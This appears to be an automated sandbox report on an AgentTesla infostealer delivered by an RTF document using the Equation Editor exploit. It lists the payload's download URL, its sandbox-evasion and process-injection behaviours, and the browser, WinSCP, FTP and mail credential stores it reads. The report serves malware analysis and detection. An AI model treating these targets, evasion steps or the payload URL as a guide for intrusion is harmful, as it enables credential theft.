Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\microme09255.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\microme09255.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\microme09255.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\microme09255.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\microme09255.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\microme09255.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\microme09255.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\microme09255.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\microme09255.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\microme09255.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\microme09255.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\microme09255.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\microme09255.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\microme09255.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\microme09255.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\microme09255.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\microme09255.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\microme09255.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\microme09255.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\microme09255.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\microme09255.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\microme09255.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\microme09255.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\microme09255.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\microme09255.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\microme09255.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\microme09255.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\microme09255.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\microme09255.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\microme09255.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\microme09255.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\microme09255.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\microme09255.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\microme09255.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\microme09255.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\microme09255.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\microme09255.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\microme09255.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\microme09255.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\microme09255.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\microme09255.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\microme09255.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\microme09255.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\microme09255.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\microme09255.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\microme09255.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\microme09255.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\microme09255.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\microme09255.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\microme09255.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\microme09255.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\microme09255.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\microme09255.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\microme09255.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\microme09255.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\microme09255.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\microme09255.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\microme09255.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\microme09255.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\microme09255.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\microme09255.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\microme09255.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\microme09255.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\microme09255.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\microme09255.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\microme09255.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\microme09255.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\microme09255.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\microme09255.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\microme09255.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\microme09255.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\microme09255.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\microme09255.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\microme09255.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Users\user\AppData\Roaming\microme09255.scr

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Source: C:\Users\user\AppData\Roaming\microme09255.scr	Memory allocated: 1C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\microme09255.scr	Memory allocated: 22C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\microme09255.scr	Memory allocated: 900000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\microme09255.scr	Memory allocated: 390000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\microme09255.scr	Memory allocated: 22C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\microme09255.scr	Memory allocated: 9E0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\AppData\Roaming\microme09255.scr	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\microme09255.scr	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\microme09255.scr	Thread delayed: delay time: 1200000	Jump to behavior

Source: C:\Users\user\AppData\Roaming\microme09255.scr

Window / User API: threadDelayed 9831

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2852	Thread sleep time: -300000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\microme09255.scr TID: 3196	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\microme09255.scr TID: 3252	Thread sleep time: -300000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\microme09255.scr TID: 3320	Thread sleep time: -7378697629483816s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\microme09255.scr TID: 3320	Thread sleep time: -6000000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\microme09255.scr TID: 3324	Thread sleep count: 9831 > 30	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3440	Thread sleep time: -180000s >= -30000s	Jump to behavior

Source: C:\Users\user\AppData\Roaming\microme09255.scr

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Source: C:\Users\user\AppData\Roaming\microme09255.scr

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Users\user\AppData\Roaming\microme09255.scr	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\microme09255.scr	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\microme09255.scr	Thread delayed: delay time: 1200000	Jump to behavior

Source: C:\Users\user\AppData\Roaming\microme09255.scr

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Roaming\microme09255.scr

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\AppData\Roaming\microme09255.scr

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

.NET source code references suspicious native API functions

Source: 5.2.microme09255.scr.230000.0.raw.unpack, vTOBOpTyAAvQkvZvwvxLfhLDrUkCOfiQETyyQECGGfUQGE.cs	Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi))
Source: 5.2.microme09255.scr.230000.0.raw.unpack, vTOBOpTyAAvQkvZvwvxLfhLDrUkCOfiQETyyQECGGfUQGE.cs	Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi))
Source: 5.2.microme09255.scr.230000.0.raw.unpack, vTOBOpTyAAvQkvZvwvxLfhLDrUkCOfiQETyyQECGGfUQGE.cs	Reference to suspicious API methods: ReadProcessMemory(processInformation.ProcessHandle, num3 + 8, ref buffer, 4, ref bytesRead)
Source: 5.2.microme09255.scr.344a420.5.raw.unpack, Qy2X.cs	Reference to suspicious API methods: ljK.OpenProcess(zK2m4hVdZK5.DuplicateHandle, bInheritHandle: true, (uint)eUXyuV2.ProcessID)

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Roaming\microme09255.scr

Memory written: C:\Users\user\AppData\Roaming\microme09255.scr base: 400000 value starts with: 4D5A

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\microme09255.scr "C:\Users\user\AppData\Roaming\microme09255.scr"			Jump to behavior
Source: C:\Users\user\AppData\Roaming\microme09255.scr	Process created: C:\Users\user\AppData\Roaming\microme09255.scr "C:\Users\user\AppData\Roaming\microme09255.scr"			Jump to behavior

Source: C:\Users\user\AppData\Roaming\microme09255.scr	Queries volume information: C:\Users\user\AppData\Roaming\microme09255.scr VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Roaming\microme09255.scr	Queries volume information: C:\Users\user\AppData\Roaming\microme09255.scr VolumeInformation			Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected AgentTesla

Source: Yara match	File source: 5.2.microme09255.scr.344a420.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.microme09255.scr.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.microme09255.scr.340f9f0.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.microme09255.scr.344a420.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.microme09255.scr.340f9f0.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.883629068.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.348615893.000000000339A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: microme09255.scr PID: 3176, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: microme09255.scr PID: 3204, type: MEMORYSTR

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\AppData\Roaming\microme09255.scr

Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Roaming\microme09255.scr	File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini	Jump to behavior
Source: C:\Users\user\AppData\Roaming\microme09255.scr	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Roaming\microme09255.scr	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini	Jump to behavior
Source: C:\Users\user\AppData\Roaming\microme09255.scr	File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\AppData\Roaming\microme09255.scr

File opened: C:\FTP Navigator\Ftplist.txt

Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\AppData\Roaming\microme09255.scr	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\AppData\Roaming\microme09255.scr	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\AppData\Roaming\microme09255.scr	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles	Jump to behavior
Source: C:\Users\user\AppData\Roaming\microme09255.scr	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Users\user\AppData\Roaming\microme09255.scr	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001	Jump to behavior
Source: C:\Users\user\AppData\Roaming\microme09255.scr	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	Jump to behavior
Source: C:\Users\user\AppData\Roaming\microme09255.scr	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003	Jump to behavior
Source: C:\Users\user\AppData\Roaming\microme09255.scr	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior

Source: Yara match	File source: 5.2.microme09255.scr.344a420.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.microme09255.scr.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.microme09255.scr.340f9f0.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.microme09255.scr.344a420.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.microme09255.scr.340f9f0.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.883629068.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.883885788.0000000002310000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.348615893.000000000339A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: microme09255.scr PID: 3176, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: microme09255.scr PID: 3204, type: MEMORYSTR

Remote Access Functionality

Yara detected AgentTesla

Source: Yara match	File source: 5.2.microme09255.scr.344a420.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.microme09255.scr.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.microme09255.scr.340f9f0.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.microme09255.scr.344a420.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.microme09255.scr.340f9f0.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.883629068.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.348615893.000000000339A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: microme09255.scr PID: 3176, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: microme09255.scr PID: 3204, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	121 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	11 Disable or Modify Tools	2 OS Credential Dumping	1 File and Directory Discovery	Remote Services	11 Archive Collected Data	2 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Native API	Boot or Logon Initialization Scripts	111 Process Injection	1 Deobfuscate/Decode Files or Information	21 Input Capture	24 System Information Discovery	Remote Desktop Protocol	2 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	33 Exploitation for Client Execution	Logon Script (Windows)	Logon Script (Windows)	21 Obfuscated Files or Information	1 Credentials in Registry	11 Security Software Discovery	SMB/Windows Admin Shares	1 Email Collection	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Install Root Certificate	NTDS	1 Query Registry	Distributed Component Object Model	21 Input Capture	13 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Software Packing	LSA Secrets	1 Process Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Timestomp	Cached Domain Credentials	141 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	11 Masquerading	Proc Filesystem	1 Remote System Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 Modify Registry	/etc/passwd and /etc/shadow	1 System Network Configuration Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	141 Virtualization/Sandbox Evasion	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	111 Process Injection	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Payment Swift.doc	43%	ReversingLabs	Document-RTF.Exploit.CVE-2017-11882
Payment Swift.doc	46%	Virustotal		Browse

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\microm[1].scr	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\microme09255.scr	100%	Joe Sandbox ML

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
covid19help.top	25%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://ocsp.entrust.net03	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	0%	URL Reputation	safe
http://www.diginotar.nl/cps/pkioverheid0	0%	URL Reputation	safe
http://ocsp.entrust.net0D	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	0%	URL Reputation	safe
https://covid19help.top/microm.scrj	100%	Avira URL Cloud	malware
https://covid19help.top/microm.scrC:	100%	Avira URL Cloud	malware
https://covid19help.top/microm.scr	100%	Avira URL Cloud	phishing
https://covid19help.top/t	100%	Avira URL Cloud	malware
https://covid19help.top/microm.scrkkC:	100%	Avira URL Cloud	malware
https://covid19help.top/microm.scrY	100%	Avira URL Cloud	malware
https://covid19help.top/microm.scr	22%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
covid19help.top	104.21.83.128	true	true	25%, Virustotal, Browse	unknown
api.ipify.org	172.67.74.152	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://covid19help.top/microm.scr	true	22%, Virustotal, Browse Avira URL Cloud: phishing	unknown
https://api.ipify.org/	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://schemas.xmlsoap.org/ws/2005/05/identity	microme09255.scr.2.dr	false		high
http://ocsp.entrust.net03	EQNEDT32.EXE, 00000002.00000002.348086913.000000000066A000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.346867219.0000000000663000.00000004.00000020.00020000.00000000.sdmp, microme09255.scr, 00000006.00000002.884220115.00000000059F0000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://covid19help.top/microm.scrC:	EQNEDT32.EXE, 00000002.00000003.346877641.0000000000632000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	EQNEDT32.EXE, 00000002.00000002.348086913.000000000066A000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.346867219.0000000000663000.00000004.00000020.00020000.00000000.sdmp, microme09255.scr, 00000006.00000002.884220115.00000000059F0000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dateofbirthxhttp://schemas.xmlsoap.org/ws/2005	microme09255.scr, 00000005.00000000.346915101.0000000000DE2000.00000020.00000001.01000000.00000004.sdmp, microm[1].scr.2.dr, microme09255.scr.2.dr	false		high
http://www.diginotar.nl/cps/pkioverheid0	EQNEDT32.EXE, 00000002.00000002.348086913.000000000066A000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.346867219.0000000000663000.00000004.00000020.00020000.00000000.sdmp, microme09255.scr, 00000006.00000002.884220115.00000000059F0000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/stateorprovince	microme09255.scr, 00000005.00000000.346915101.0000000000DE2000.00000020.00000001.01000000.00000004.sdmp, microm[1].scr.2.dr, microme09255.scr.2.dr	false		high
http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1	microme09255.scr, 00000005.00000000.346915101.0000000000DE2000.00000020.00000001.01000000.00000004.sdmp, microm[1].scr.2.dr, microme09255.scr.2.dr	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/thumbprintshttp://schemas.xmlsoap.org/ws/2005/	microme09255.scr, 00000005.00000000.346915101.0000000000DE2000.00000020.00000001.01000000.00000004.sdmp, microm[1].scr.2.dr, microme09255.scr.2.dr	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/surname	microme09255.scr, 00000005.00000000.346915101.0000000000DE2000.00000020.00000001.01000000.00000004.sdmp, microm[1].scr.2.dr, microme09255.scr.2.dr	false		high
